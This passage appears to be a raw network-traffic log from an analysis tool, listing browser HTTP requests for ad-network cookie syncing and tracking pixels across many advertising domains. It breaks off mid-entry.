Source: global traffic	HTTP traffic detected: GET /sync?id=10&google_gid=CAESELZvmPR7DxJls1q5vUVneqI&google_cver=1&google_push=AXcoOmTOEF9Y8fogjEB4TqPOvFToDFSNcqrrOe7PA0KGyHSr7lsEvHJLWXoidRqi6SOq-7TG1-HqyFGdK2rWPeFjmNw3z3TgjDyQdg HTTP/1.1Host: sync2-dsp.e-volution.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d/sync/cookie/generic?https://cm.g.doubleclick.net/pixel?google_nid=adelphic_mobile&google_gid=CAESEFdi1-RiPfWOI2CLRzbOGh8&google_cver=1&google_push=AXcoOmRs--NX_amzQoFfaVNg5QoiiG0PbKRUiH2xlJkIPOhaYBZjwU9VO-TZql-FDrFlnoZ8M75CK8ZQ9kFGCZP5OX1boLe0fbMXAQ&google_hm=${ADELPHIC_CUID_B64} HTTP/1.1Host: sync.ipredictive.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sync?exchange=11&google_gid=CAESEEsdtE4SKtYWVNPeVuWOY-c&google_cver=1&google_push=AXcoOmSt6_labGwG7eZ_989UtFK9wsaMAzKlKq1YttCVRXJ4tJ7NNPhWGVLSYuXx1V87z2xqKNZZQWX1Dv1IKIrsa3-8sxKvqRw_lA HTTP/1.1Host: dsp.adkernel.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /api/adx/cm/pixel?google_gid=CAESEPW3MUN8tvNLNoJsiPIpkO8&google_cver=1&google_push=AXcoOmRTXTUn1Pr6awWAnQRPgchY6LBTD7UWgfftnoBHloxfG5GmoNInKY9_iM4LiUT3GONf9BhydenY40DkAIQfixnY9Gu6A9hJZS1O HTTP/1.1Host: www.temu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /f/AGSKWxXE0rdt5cwklf9PRBqqi8rFncdilTmLVYbRCmgcYEIr_h6aXnlDVbYl8-Mw69k26WrMfK2ANMfR9tO7b_s5NhLr9ZNkM_vAqZxxWuutweCz4t4EvQ7RPeu7lVUr28c-H-5-bioZAg==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzcyLDU3NDAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNl0sbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMV0sImh0dHBzOi8vdHJrc3lsbi5uZXQvRXJyb3IiLG51bGwsW1s4LCJZc2dPT2N0dWtySSJdLFs5LCJlbi1VUyJdLFsxOSwiMiJdLFsxNywiWzBdIl0sWzE4LCJbW1sxXV1dIl1dXQ HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sync?exchange=11&google_gid=CAESEDdTD-hSLjZJhPlP3FuVp9M&google_cver=1&google_push=AXcoOmSt1m7rF-4iFBqUxfNrh9kLkm2l2-27NM6ylpVM1BbGfx988rXg5S47kzFlUujGYJTCJlkITmT_GbciUFrM5Au3IbUbXt8y HTTP/1.1Host: dsp.adkernel.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bh/rtset?pid=559960&gp=1&google_gid=CAESEC6PH-lvJoYH9V_-6nwhMus&google_cver=1&google_push=AXcoOmQHW3Senmpk8tpcaDaCAkasoYHxB1QL3vzrRn4MuUN_wlYAkuh8f5ngrgzRfD_4zBEpSvzZMxzLE6FJ02A6qXPBh-8n3s0ad4A9 HTTP/1.1Host: bh.contextweb.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /match/47/?remote_uid=CAESEA_YaeSFRZgNp7ugVZyanQk&c_param1=AXcoOmQJjBajovnqSJhcnjB8OznNBMIfG7StGCCKjvywNcFSn6R5uJC5Ake0ACufry6wJvOvysfECv7eIsLmnMa4auWPPgivRfRT0PA&gdpr=%%GDPR%%&addtl_consent=%%ADDTL_CONSENT%%&google_cver=1 HTTP/1.1Host: s.uuidksinc.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sync?nid=154&google_gid=CAESEHWbVka7PFDHpdWk2787PTM&google_cver=1&google_push=AXcoOmRyI8F21-Wg9-ClV_GMcSKS-JEdK8e0hNkNpUxrM_9_KTEJg_mGuqLEG93DCe1MxNcb1YG8zgga00vYgS2qswEdwz2nZ6Ibdw HTTP/1.1Host: sync.srv.stackadapt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /gp_match?google_gid=CAESEEQQDa5m7sjciSE7Ndvm-Qs&google_cver=1&google_push=AXcoOmSIhx_awINzXgzYWs7Ldkdetu8Y-SBwDodzM3mFTtUbrbhkp0OS6hSo2f96raiQfkDC1lzy9png7PoLVky3HNMKBXYnTJqxnD8 HTTP/1.1Host: um.simpli.fiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cookie-sync/adx?google_gid=CAESENLpOVFDHsC-VfNLaLRul-w&google_cver=1&google_push=AXcoOmRCFB4RRBFgylxbOFqFBPjZeDvCs7GKRvkfHQCCMWA8xyYRxGIyqTtHvnHsOhTFPNWwGBpagrnbCD1tYp2Fb3NXZOXDekx5 HTTP/1.1Host: match.prod.bidr.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sync?nid=154&google_gid=CAESEOhl-PvFg9cy4oKnILke398&google_cver=1&google_push=AXcoOmRtdCb-MvIoLYG0BLsM4ImCpoRrxKqAbDTAIJV5X2WKmBHF96QTkDLW4_9rU_cVAa9PlVl7JS_w5IFmJvCMk_9EQJFv2n-HLvp_ HTTP/1.1Host: sync.srv.stackadapt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /pagead/drt/ui HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://googleads.g.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ads/measurement/l?ebcid=ALh7CaR80l8t9U7n9gXPOfu3w6UyLAl3cik-0i5KBcl3_ssI2Gtx2spmIdHhFx9UzfMiFWCsz14vmro9J-xO4PKboOMcIXp8MA HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://googleads.g.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sync?id=10&google_gid=CAESEMDhonF9Btdu1XWfNJz5fhA&google_cver=1&google_push=AXcoOmSVgF44yqfpd96VbFVh_KjAPRPC4Ai_8ZtMMIn9azfRglCI6xaLv6qNovrTM_6iJz8pWP9tCIBnejjHjsYUA-2q3qq8sZJAfaeuHw HTTP/1.1Host: sync2-dsp.e-volution.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: production=42792e3cde3b100032f83ab40466
Source: global traffic	HTTP traffic detected: GET /api/adx/cm/pixel?google_gid=CAESENYT61gwLXGsOhmLZBLf7tE&google_cver=1&google_push=AXcoOmSwaAEJs2KOmCEYVvFDTykRMfzP5EgxESu2Kp_CNP1qYCwsJSzte81WmXDP9HOJ6CmStE9CMEmJ5PqfvDw16JSgB3T_dmeec4Dc4Q HTTP/1.1Host: www.temu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sync?exchange=11&google_gid=CAESEBNhaeuSmOpsq07SBs2IyhE&google_cver=1&google_push=AXcoOmTePKwToHaeIQGu8M56gWDzY-1geiWnlUHfQIpsbYld60Ki_rzZaP9OaIWvTKZwgr332ljGgxcxDcFPggPWRaGld0nzhuAzAeO9 HTTP/1.1Host: dsp.adkernel.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADK_EX_11=1; ADKUID=A8836978867793438466
Source: global traffic	HTTP traffic detected: GET /dis/usersync.aspx?r=4&p=14&cp=google&cu=1&url=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dcjp%26google_hm%3D%40%40CRITEO_USERID%40%40%26google_push%3DAXcoOmQ1NvIkBuiezRP4VyO1tot_Yk-dOVvINUBM4mZHt7YSmwC9oik7a2vt6010qe8UdTECB7DIt_PBPnp2mLudoQCl_f0ZmP97TYXp&google_gid=CAESEBG-T-imfgN0jPbZ2bYvkgg&google_cver=1 HTTP/1.1Host: dis.criteo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ju/cs/google?google_gid=CAESEI1qM-uapk6ijqCEkmvquJE&google_cver=1&google_push=AXcoOmQzdVcA5PSUWiPvj9qwcPXZXVb8HNbTivNbTzQifDQck24kFKR7TStxtgxFXn-j4k3gshyw_znnZgyV57zTXchMvGa5P0ZnjS-k9g HTTP/1.1Host: gtrace.mediago.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /gp_match?google_gid=CAESEAH4BonoisDzvjD0eD3Gsmw&google_cver=1&google_push=AXcoOmSsQrt-_qiBrr6OIHfpWMD-3_UYpvvZqW8G6sH9gjdwVNowHfTsgvspPMInOQti-TkQ0oB5OJiwg4bv4pExTTZs6MqwMVAtC6Uq HTTP/1.1Host: um.simpli.fiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cookie-sync/adx?google_gid=CAESEDiYK4sqMzOUbRWTRd1nDCw&google_cver=1&google_push=AXcoOmTo2EAoqgbbw2Cb7fAUVP11_HvIEeWtIz6kljuEJPQ-1zPelC1FFe0JAUhRlBsW8tvUPC7tKMRWC2hCdktOiSxuOb6V8OXC1zof HTTP/1.1Host: match.prod.bidr.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /track/cmf/google?google_gid=CAESELJu5-7ezmiSZQVy8-_oFDQ&google_cver=1&google_push=AXcoOmRx0KuDS_5o9Zy6vJW0KAWcooCxdmf_izsR3SRJiVhg6QBKvaasyHJxXO09-1UoZ8_V-EKFl_9_C3vcmkaDrVzPGOLrd9VN9N3E HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ads/measurement/l?ebcid=ALh7CaT6FXIFvZW0DewpsEqJBJb-MJQr7sID113NOOXgib0Cx-XeGuKQUcr0n_lcem5uugkeRxWKqm8lNexqlA8pQp9GUBq5lQ HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://googleads.g.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ju/cs/google?google_gid=CAESEI1qM-uapk6ijqCEkmvquJE&google_cver=1&google_push=AXcoOmSt9V-XvEosgwdO7hh7p0jmvZETv7AYYur3PP_0VA1kMD3uehc9zWkhZYvPw1d4cIrehwUweUItUNBJO3bWkfNSIgQy8JM9jQizFQ HTTP/1.1Host: gtrace.mediago.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sync/adx?google_gid=CAESEEmQdMAM7E0W-DH6rhDiIxs&google_cver=1&google_push=AXcoOmSC5XzHMFryMzDkGxghutUO-mvFIJ78eTpuHDkgVH0JaQqClGaoWQeMEbZOwXl-_6VPMlKnpXxaJBwSkNZeCT74kzVwrTTEcm0 HTTP/1.1Host: pr-bh.ybp.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /google_pixel?google_gid=CAESEL2a7VS9IX-35Rzq52wUduA&google_cver=1&google_push=AXcoOmSrY7ICbKSMUirrf7SY7fPPWmw6Wx0t2MDX6BAA8aQDy1xy3RAKRzdLj7nTAXJsX4R08bXl2xtQtgoiufKBt9jpDiLgb0-rFvw HTTP/1.1Host: ads.travelaudience.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /f/AGSKWxVliFzt__e0MUU_SOrGx-lhlS6uQAPdw7fuvmC9ZOEsgVNDhFt6QsFFNlaOQwy5PSsxhxcDWnH1x8vkCo4uTDzz2qaGDiiWUxEb4DdVXaVIkxYLejIwjKuC0DHCYaFx6xUnkqAxgw==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzczLDk4NTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNiwxNV0sbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMV0sImh0dHBzOi8vdHJrc3lsbi5uZXQvRXJyb3IiLG51bGwsW1s4LCJZc2dPT2N0dWtySSJdLFs5LCJlbi1VUyJdLFsxOSwiMiJdLFsxNywiWzBdIl0sWzE4LCJbW1sxXV1dIl0sWzIsIltudWxsLFtudWxsLDEsWzE3MzAzOTg3NzQsMjY1MzU5MDAwXV1dIl1dXQ HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /match/?int_id=19&redir=1&google_gid=CAESEKcM364RUx5QMSs2V2LwRf8&google_cver=1&google_push=AXcoOmSBEqLcMQ1_a7fW7NcT2Iei-MG31IkeZEJ4zsIXZrw5PAIP7aNgsrC8sU8h46pHu40uiZnbXPrhr6kfd4hGeSk-YKS5ry9iw6eT HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: 